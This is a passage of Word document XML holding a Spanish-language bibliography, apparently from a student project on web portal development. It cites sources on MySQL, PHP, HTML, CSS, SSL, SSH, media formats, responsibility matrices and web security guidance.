                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">César, P. L. (2004). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>MySQL para Windows y Linux.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> México, df: Alfaomega Grupo Editor S.A de C.V.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Ceszpiicz's. (2 de SEPTIEMBRE de 2009). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>ceszpiicz.wordpress.com</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Ventajas y Desventajas del formato MP3: https://ceszpiicz.wordpress.com/2009/09/02/%C2%BFcuales-son-las-ventajas-y-desventajas-del-formato-mp3/</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:lastRenderedPageBreak/>
                <w:t xml:space="preserve">docs, M. w. (15 de May de 2005). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>MDN</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Mozilla: https://developer.mozilla.org/es/docs/Learn/Getting_started_with_the_web/JavaScript_basics</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">EcuRed. (15 de Mayo de 2018). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>EcuRed</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de EcuRed: https://www.ecured.cu/CSS3</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Entre Desarrolladores.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (24 de Enero de 2015). Obtenido de https://entredesarrolladores.com/6896/apache-tomcat-8-0-9-vs-glassfish-server-4-1</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Figuerola, N. (JUNIO de 2012). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>articulospm.files.wordpress.com</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Matriz de Asignación de Responsabilidades (RAM): https://articulospm.files.wordpress.com/2012/07/matriz-de-asignacic3b3n-de-responsabilidades1.pdf</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Guzmán Sánchez Mejorado, C. (2012). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>BIBLIOTECAECEST.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (I. P. Nacional, Ed.) Obtenido de BIBLIOTECAECEST - Aplicaciones computacionales para la simplificación del manejo administrativo de una institución de educación superior: http://www.repositoriodigital.ipn.mx/handle/123456789/6329</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Hose, C. (1 de FEBRERO de 2018). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>www.cuidatudinero.com</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Desempeño laboral: https://www.cuidatudinero.com/13098642/cual-es-la-definicion-de-desempeno-laboral</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">HTML, A. d. (15 de Mayo de 2018). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Acerca de HTML</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Manual HTML: http://www.acercadehtml.com/manual-html/que-es-html.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Inc, D. (01 de Enero de 2003). </w:t>
              </w:r>
              <w:r w:rsidRPr="004F7BF9">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>¿Què es SSL (Secure Sockets Layer)?</w:t>
              </w:r>
              <w:r w:rsidRPr="004F7BF9">
                <w:rPr>
                  <w:noProof/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>Recuperado el 18 de Mayo de 2018, de ¿Què es SSL (Secure Sockets Layer)?: https://www.digicert.com/es/ssl.htm</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Jiménez Flores, Oscar, Méndez Vilchis, Mario Alberto, Montero Márquez, Andrés, Morales Vilchis, Diana &amp; Velasco Esquivel, Victor Ernesto. (2012). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Universidad Nacional Autónoma de México Facultad de Ingeniería.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Obtenido de Desarrollo de un portal en internet, para empresa que comercializa Bolsos: www.ptolomeo.unam.mx</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Joshimar, C. S. (20 de Marzo de 2014). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Slideshare.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Obtenido de https://es.slideshare.net/joshimarc/vulnerabilidades-web-32542315</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:lastRenderedPageBreak/>
                <w:t xml:space="preserve">Massachusetts, I. d. (01 de Enero de 2018). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Protocolo SSH.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Recuperado el 18 de Mayo de 2018, de Protocolo SSH.: http://web.mit.edu/rhel-doc/4/RH-DOCS/rhel-rg-es-4/ch-ssh.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Mejia, A. (11 de Junio de 2011). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Slidershare.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Obtenido de Ventajas y desventajas de los servidores apache y IIS: https://es.slideshare.net/Anthony_mejias/ventajas-y-desventajas-de-los-servidores-apache-y-iis</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>mentory.online</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. (15 de FEBRERO de 2018). Obtenido de RACI o matriz de responsabilidades: https://mentory.online/2018/02/raci-o-matriz-de-responsabilidades.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>MySQL Developer Zone.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (2010). Obtenido de Las principales características de MySQL: http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>OWASP.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (2017). Obtenido de OWASP - Top 10 - 2017 Los diez riesgos más criticos en Aplicaciones Web: https://www.owasp.org/index.php/Top_10-2017_Foreword</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>pages.nist.gov.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (13 de Mayo de 2018). Obtenido de Authenticator and Verifier Requirements: https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret </w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Puertas, J. P. (2004). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Creación de un portal con PHP y MYSQL.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> México: RA-MA editorial.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Quijado, J. L. (2010). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Domine PHP y MYSQL.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> México: RA-MA Editorial.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Román Muñoz, Fernando, Sabido Cortés, Iván Israel &amp; García Villalba, Luis Javier. (2014). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>BIBLIOTECAECEST.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (U. d. Alicante, Ed.) Obtenido de BIBLIOTECAECEST - Capacidades de detección de las herramientas de análisis de vulnerabilidades en aplicaciones web: https://rua.ua.es/dspace/bitstream/10045/40421/1/RECSI-2014_29.pdf</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Santamaria, José &amp; Hernández, Javier. (2018). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>IES San Vicente .</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Obtenido de IES San Vicente - Microsoft SQL Server: https://iessanvicente.com/colaboraciones/sqlserver.pdf</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>sites.google.com</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">. (17 de MAYO de 2018). Obtenido de Matriz de asignación de responsabilidades (RACI): </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:lastRenderedPageBreak/>
                <w:t>https://sites.google.com/site/upcintroagerencia/matriz-de-asignacion-de-responsabilidades-raci</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Software, R. (1 de FEBRERO de 2018). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>/www.remosoftware.com</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de archivos-avi-ventajas-y-desventajas-: https://www.remosoftware.com/info/es/archivos-avi-ventajas-y-desventajas-y-como-abrir-uno/</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>SQL Server.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (2018). Obtenido de https://sqlserver4b.weebly.com/ventajas-y-desventajas.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Super Información Web.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (2014). Obtenido de http://superinformacionweb.blogspot.mx/2014/11/ventajas-y-desventajas-de-mysql.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Torres, L. M. (14 de Abril de 2013). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Método de Ruta Crítica – CPM (Critical Path Method) </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Método de Ruta Crítica – CPM (Critical Path Method) : http://www.eoi.es/blogs/madeon/2013/04/14/metodo-de-ruta-critica-cpm-critical-path-method/</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Tutorialspoint.com (Ed.). (2010). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>OpenLibra.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Obtenido de OpenLibra - MySQL: https://openlibra.com/es/book/mysql-tutorial</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Universidad de allende.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> (2002). Obtenido de Universidad de allende - Productos para desarrollar aplicaicones web: ASP, CFM, JSP y PHP: https://rua.ua.es/dspace/bitstream/10045/14015/4/2-asp-cfm-jsp-php.pdf</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Valdés, D. P. (02 de Noviembre de 2007). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Mestros de la web</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Mestros de la web: http://www.maestrosdelweb.com/los-diferentes-lenguajes-de-programacion-para-la-web/</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Valladares, N. A. (17 de Mayo de 2018). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>computerhelperblogs.blogspot.mx</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de Ventajas y desventajas de los formatos de música y sonidos: http://computerhelperblogs.blogspot.mx/p/blog-page.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Varela, M. (22 de Marzo de 2016). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Cursos femxa.es.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Obtenido de Cursos femxa.es - 5 Grandes ventajas de Oracle: https://www.cursosfemxa.es/blog/desarrollo-profesional/5-ventajas-oracle</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Ward, D. (17 de MAYO de 2018). </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>techlandia.com</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. Obtenido de WMV: https://techlandia.com/wmv-info_295712/</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:lastRenderedPageBreak/>
                <w:t>www.coolutils.com</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. (17 de MAYO de 2018). Obtenido de OGG: https://www.coolutils.com/es/Formats/OGG</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="009E53AE" w:rsidRDefault="009E53AE" w:rsidP="009E53AE">
              <w:pPr>
                <w:pStyle w:val="Bibliografa"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>www.ite.educacion.es</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>. (17 de MAYO de 2018). Obtenido de Formatos de audio: http://www.ite.educacion.es/formacion/materiales/107/cd/audio/audio0102.html</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="00D168BF" w:rsidRDefault="00D168BF" w:rsidP="009E53AE">
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00574B2B" w:rsidRPr="00D27FEB" w:rsidRDefault="00574B2B" w:rsidP="00FB1705">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:sectPr w:rsidR="00574B2B" w:rsidRPr="00D27FEB" w:rsidSect="002D6D25">
          <w:headerReference w:type="default" r:id="rId110"/>
          <w:footerReference w:type="default" r:id="rId111"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
